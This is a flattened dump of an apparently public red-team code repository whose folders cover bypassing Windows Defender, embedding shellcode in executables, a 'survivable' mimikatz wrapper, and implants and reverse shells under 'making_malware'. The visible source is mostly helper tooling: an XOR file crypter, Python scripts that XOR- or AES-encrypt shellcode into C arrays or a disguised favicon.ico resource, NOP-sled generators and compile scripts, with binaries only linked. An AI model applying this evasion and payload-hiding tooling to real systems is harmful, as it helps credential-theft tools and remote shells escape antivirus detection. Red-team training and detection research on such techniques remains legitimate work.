(!output_file) { 21 | std::cerr << "Error: Could not open output file " << argv[2] << std::endl; 22 | return 1; 23 | } 24 | 25 | // Encrypt the file 26 | char key = 'K'; // Key used for XOR encryption 27 | char buffer; 28 | while (input_file.read(&buffer, 1)) { 29 | buffer ^= key; 30 | output_file.write(&buffer, 1); 31 | } 32 | 33 | // Close the input and output files 34 | input_file.close(); 35 | output_file.close(); 36 | 37 | return 0; 38 | } -------------------------------------------------------------------------------- /Cpp/crypter/main.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/crypter/main.obj -------------------------------------------------------------------------------- /Cpp/crypter/out.txt: -------------------------------------------------------------------------------- 1 | ?.8? -------------------------------------------------------------------------------- /Cpp/crypter/test.txt: -------------------------------------------------------------------------------- 1 | test -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/build_the_sleigh.py: -------------------------------------------------------------------------------- 1 | print '0x90, ' * 1024000 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS /std:c++20 /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:3000000000 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/implant.exe -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/meterpreter/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/meterpreter/beautify.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | try: 4 | plaintext = open(sys.argv[1], "rb").read() 5 | except: 6 | print("File argument needed! %s " % sys.argv[0]) 7 | sys.exit() 8 | 9 | 10 | #open("payload.out",'wb').write(plaintext) 11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };') -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/meterpreter/build_the_sleigh.py: -------------------------------------------------------------------------------- 1 | print '0x90, ' * 2048000 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/meterpreter/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS /std:c++20 /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:300000000 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/vt-results-2022-12-28.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/vt-results-2022-12-28.png -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/vt_results.txt: -------------------------------------------------------------------------------- 1 | https://www.virustotal.com/gui/file-analysis/OGY3Y2M5M2ZjNDkwZDZkZGMxN2Y2N2EyZmIzNDlhMjQ6MTY3MjI4NTY3Nw== -------------------------------------------------------------------------------- /Cpp/deceiving_defender/BigStackBypass/windows-wallpaper.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/windows-wallpaper.jpg -------------------------------------------------------------------------------- /Cpp/deceiving_defender/Readme.md: -------------------------------------------------------------------------------- 1 | Collection of code snippets used to bypass Windows Defender's protections. 2 | -------------------------------------------------------------------------------- /Cpp/deceiving_defender/name_bypass/Readme.md: -------------------------------------------------------------------------------- 1 | Using a simple name check to bypass Windows Defender. 2 | 3 | -------------------------------------------------------------------------------- /Cpp/deceiving_defender/name_bypass/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/name_bypass/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/name_bypass/implant.exe -------------------------------------------------------------------------------- /Cpp/deceiving_defender/one/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/deceiving_defender/one/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/one/implant.exe -------------------------------------------------------------------------------- /Cpp/deceiving_defender/one/implant.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/one/implant.obj -------------------------------------------------------------------------------- /Cpp/embedding_payloads/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/calc_x64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/calc_x64.bin -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | x86_64-w64-mingw32-g++ good.cpp -o good_x64.exe -Wl,-subsystem,windows -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/even_better_x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/even_better_x64_PATCHED.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_PATCHED.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/even_better_x64_PATCHED_goto_MAIN.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_PATCHED_goto_MAIN.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/even_better_x64_reloc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_reloc.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/good.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * By 0xTriboulet 3 | * "good.exe" program 4 | * 12/31/22 5 | * compile with: x86_64-w64-mingw32-g++ good.cpp -o good_x64.exe -Wl,-subsystem,windows 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | #pragma comment(lib, "user32.lib") 12 | #pragma comment(lib, "kernel32.lib") 13 | 14 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, 15 | LPSTR lpCmdLine, int nCmdShow) { 16 | MessageBox(NULL, "This is a safe program!", "Safe!", 0x0); 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/good_x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/good_x64.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x64/test.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(VOID){ 6 | getchar(); 7 | //__debugbreak(); 8 | FARPROC a = GetProcAddress(LoadLibraryA("kernel32"),"CreateThread"); 9 | //__debugbreak(); 10 | printf("address %p\n:", a); 11 | printf("Success!\n"); 12 | return 0; 13 | } -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/calc_payload_32.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/calc_payload_32.bin -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | i686-w64-mingw32-g++ good.cpp -o good.exe -Wl,-subsystem,windows -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/even_better.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/even_better.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/even_better_ansi.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/even_better_ansi.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/good.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * By 0xTriboulet 3 | * "good.exe" program 4 | * 12/31/22 5 | * compile with: i686-w64-mingw32-g++ good.cpp -o good.exe -Wl,-subsystem,windows -ansi 6 | */ 7 | 8 | #include 9 | #include 10 | 11 | #pragma comment(lib, "user32.lib") 12 | 13 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, 14 | LPSTR lpCmdLine, int nCmdShow) { 15 | MessageBox(NULL, "This is a safe program!", "Safe!", 0x0); 16 | return 0; 17 | } 18 | -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/good.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/good.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good.obj -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/good_no_names.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good_no_names.exe -------------------------------------------------------------------------------- /Cpp/embedding_payloads/x86/good_w_names.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good_w_names.exe -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/Readme.md: -------------------------------------------------------------------------------- 1 | All the source and binaries used to develop a survivable mimikatz executable 2 | -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/mimikatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/mimikatz.exe -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/aesencrypt.py: -------------------------------------------------------------------------------- 1 | # Red Team Operator course code template 2 | # payload encryption with AES 3 | # 4 | # author: reenz0h (twitter: @sektor7net) 5 | 6 | import sys 7 | from Crypto.Cipher import AES 8 | from os import urandom 9 | import hashlib 10 | 11 | KEY = urandom(16) 12 | 13 | def pad(s): 14 | return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size) 15 | 16 | def aesenc(plaintext, key): 17 | 18 | k = hashlib.sha256(key).digest() 19 | iv = 16 * '\x00' 20 | plaintext = pad(plaintext) 21 | cipher = AES.new(k, AES.MODE_CBC, iv) 22 | 23 | return cipher.encrypt(bytes(plaintext)) 24 | 25 | 26 | try: 27 | plaintext = open(sys.argv[1], "rb").read() 28 | except: 29 | print("File argument needed! %s " % sys.argv[0]) 30 | sys.exit() 31 | 32 | ciphertext = aesenc(plaintext, KEY) 33 | open("favicon.ico",'wb').write(ciphertext) 34 | print('payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 35 | print('AESkey[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };') 36 | 37 | -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | rc resources.rc 4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 5 | 6 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcmimikatz.cpp /link /OUT:mimikatz.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/favicon.ico -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/mimikatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/mimikatz.exe -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/mimikatz.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/mimikatz.obj -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/resources.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/resources.o -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/resources.res -------------------------------------------------------------------------------- /Cpp/hidden_mimikatz/wrapper/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/shellcode.bin -------------------------------------------------------------------------------- /Cpp/making_malware/Readme.md: -------------------------------------------------------------------------------- 1 | Source and binaries for achieving reverse shells on modern Windows systems. 2 | -------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/beautify.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | 4 | 5 | try: 6 | plaintext = open(sys.argv[1], "rb").read() 7 | except: 8 | print("File argument needed! %s " % sys.argv[0]) 9 | sys.exit() 10 | 11 | 12 | open("payload.out",'wb').write(plaintext) 13 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };') 14 | -------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W2 /GS- /DNDEBUG /Tpimplantv1.cpp /link /OUT:implantv1.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/implant.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implant.obj -------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/implantv1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implantv1.exe -------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/implantv1.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implantv1.obj -------------------------------------------------------------------------------- /Cpp/making_malware/implantv1/xorencrypt.py: -------------------------------------------------------------------------------- 1 | # Red Team Operator course code template 2 | # payload encryption with XOR 3 | # 4 | # author: reenz0h (twitter: @sektor7net) 5 | 6 | import sys 7 | 8 | KEY = "WindowsSystem32" 9 | 10 | def xor(data, key): 11 | 12 | key = str(key) 13 | l = len(key) 14 | output_str = "" 15 | 16 | for i in range(len(data)): 17 | current = data[i] 18 | current_key = key[i % len(key)] 19 | output_str += chr(ord(current) ^ ord(current_key)) 20 | 21 | return output_str 22 | 23 | def printCiphertext(ciphertext): 24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 25 | 26 | 27 | 28 | try: 29 | plaintext = open(sys.argv[1], "rb").read() 30 | except: 31 | print("File argument needed! %s " % sys.argv[0]) 32 | sys.exit() 33 | 34 | 35 | ciphertext = xor(plaintext, KEY) 36 | open("payload.out",'wb').write(ciphertext) 37 | print("unsigned char payload[] = ") 38 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 39 | -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpimplantv2.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/implant.exe -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/implantv2.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/implantv2.obj -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL.bin -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL.txt -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/Python/ShellcodeRDI.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/ShellcodeRDI.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/Python/reverseDLL.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/reverseDLL.txt -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/compileDLL.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /W1 /D_USRDLL /D_CRT_SECURE_NO_WARNINGS /D_WINDLL *.cpp /MT /link /DLL /OUT:reverse.dll 4 | echo Cleaning up... 5 | del *.obj *.lib *.exp -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/reverse.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverse.bin -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/reverse.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverse.dll -------------------------------------------------------------------------------- /Cpp/making_malware/implantv2/reverseDLL/reverseDLL.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverseDLL.bin -------------------------------------------------------------------------------- /Cpp/making_malware/implantv3/Readme.md: -------------------------------------------------------------------------------- 1 | Implantv3 Main.cpp 2 | 3 | For VX-API check out: 4 | https://github.com/vxunderground/VX-API 5 | -------------------------------------------------------------------------------- /Cpp/making_malware/implantv3/x64/Release/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv3/x64/Release/implant.exe -------------------------------------------------------------------------------- /Cpp/making_malware/implantv3/x64/Release/implantv3.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv3/x64/Release/implantv3.pdb -------------------------------------------------------------------------------- /Cpp/making_malware/misc/mm#2/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/making_malware/misc/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/beautify.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | try: 4 | plaintext = open(sys.argv[1], "rb").read() 5 | except: 6 | print("File argument needed! %s " % sys.argv[0]) 7 | sys.exit() 8 | 9 | 10 | open("payload.out",'wb').write(plaintext) 11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };') 12 | -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpreverse.cpp /link /OUT:reverse.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/payload.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/payload.out -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverse.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverse.exe -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverse.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverse.obj -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL.bin -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL.txt -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/Python/ShellcodeRDI.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/ShellcodeRDI.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/Python/reverseDLL.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/reverseDLL.txt -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/compileDLL.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /W1 /D_USRDLL /D_CRT_SECURE_NO_WARNINGS /D_WINDLL *.cpp /MT /link /DLL /OUT:reverse.dll 4 | echo Cleaning up... 5 | del *.obj *.lib *.exp -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/reverse.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/reverse.dll -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseDLL/reverseDLL.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/reverseDLL.bin -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseEXE.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseEXE.bin -------------------------------------------------------------------------------- /Cpp/making_malware/revshell/reverseEXE.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseEXE.txt -------------------------------------------------------------------------------- /Cpp/message_box/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Cpp/message_box/message_box.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | 6 | MessageBox(NULL,"My first API call", "Hello World!", 0); 7 | return 0; 8 | } -------------------------------------------------------------------------------- /Cpp/message_box/message_box.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/message_box/message_box.exe -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/ROTD.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD.exe -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/ROTD.pdb: -------------------------------------------------------------------------------- 